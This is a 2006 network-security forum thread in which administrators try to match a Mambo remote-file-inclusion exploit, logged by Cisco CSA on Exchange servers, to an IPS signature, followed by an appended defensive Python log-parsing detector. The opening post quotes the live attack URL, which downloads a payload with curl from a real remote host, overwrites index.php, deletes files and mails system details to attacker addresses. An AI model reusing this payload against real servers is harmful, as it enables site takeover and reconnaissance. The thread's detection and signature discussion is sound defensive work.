07-15-2006 11:14 AM - edited 03-10-2019 03:06 AM
Does anyone know which signature this exploit should trigger with the Cisco IPS sensor? Not sure if there is one or if we have it turned off?
We see this exploit hit our Exchange Servers many times during the week.
The process 'C:\WINNT\System32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) received the data '/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http://220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20kkparole@yahoo.com;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20michaelroul@yahoo.com;echo|'.
07-21-2006 10:54 AM
I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass". Here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.
Hope this helps
M
07-20-2006 11:53 AM
Remove the IPS config file from the router and copy the config after restarting it.
07-20-2006 01:17 PM
We have approx 40 sensors...we never see a correlation between a php exploit caught on CSA with the IPS.
Are you aware of a signature related to this exploit?
07-21-2006 10:42 AM
Could the php exploit be over 443? I do not believe CSA will tell you this. However, you could paste the url portion that CSA is reporting into a browser and send it to a web server over port 80 and see what the sensor does. What PHP exploit is this? Do you know if there is a Cisco sig out for this particular exploit?
M
07-21-2006 01:56 PM
Interesting...the global signature for 5163 is retired/disabled globally by Cisco. This signature was published August of 2001 but IMHO should be enabled and deny packet/deny flow should be set to block this activity.
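As an added example (not from this thread, and not a Cisco signature), here is a Python check that pulls the request string out of a CSA "received the data" message like the one in the original post and flags the markers of the Mambo/Joomla pattern discussed above: a remote URL in mosConfig_absolute_path, PHP superglobal overrides in the query string, a shell command in cmd, and the index2.php script named in the sig 5163 description. The sample log line, its 192.0.2.10 address and the finding tags are constructed for the example; because the host-based log records the request after TLS is terminated, this kind of check also covers the over-443 case the IPS misses.

```python
import re
from urllib.parse import unquote

# Heuristic indicators for the Mambo/Joomla request pattern quoted in the
# thread. They are written for this example and are not Cisco IPS rules.
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
SHELL_META = re.compile(r"[;|`]|\b(curl|wget|uname|mail|rm|mv)\b")
SUPERGLOBAL = re.compile(r"^(_REQUEST|_GET|_POST|_SERVER|GLOBALS)(\[|$)")

# Constructed sample in the CSA log format from the thread; the host and
# payload URL are documentation placeholders, not the values from the post.
SAMPLE_LOG = (
    "The process 'C:\\WINNT\\System32\\inetsrv\\inetinfo.exe' "
    "(as user NT AUTHORITY\\SYSTEM) received the data "
    "'/index2.php?option=com_content&do_pdf=1&id=1index2.php?"
    "_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&"
    "mosConfig_absolute_path=http://192.0.2.10/~photo/cm?&"
    "cmd=cd%20cache;curl%20-O%20http://192.0.2.10/~photo/cm;uname%20-a;echo|'."
)

def extract_request(log_line):
    """Return the quoted request data from a CSA 'received the data' line."""
    m = re.search(r"received the data '(.*)'", log_line)
    return m.group(1) if m else ""

def decode(s):
    # Decode twice so a double-encoded payload (%2520 etc.) is still seen
    return unquote(unquote(s))

def analyze_request(request):
    """Return a list of finding tags for one request URL."""
    findings = []
    path, _, query = request.partition("?")
    if path.endswith("index2.php"):  # script named in sig 5163's description
        findings.append("mambo_index2_php")
    # Split on '&' only; the embedded shell command uses ';' and must stay whole
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        key, value = decode(key), decode(value)
        if SUPERGLOBAL.match(key):
            findings.append(f"superglobal_override:{key}")
        if key == "mosConfig_absolute_path" and REMOTE_URL.match(value):
            findings.append("remote_file_inclusion:mosConfig_absolute_path")
        if key == "cmd" and SHELL_META.search(value):
            findings.append("shell_command_in_parameter:cmd")
    return findings

def analyze_log_line(log_line):
    return analyze_request(extract_request(log_line))
```

Running `analyze_log_line(SAMPLE_LOG)` returns five tags for the constructed line, while a plain `/index2.php?option=com_content&do_pdf=1&id=1` request yields only the index2.php tag.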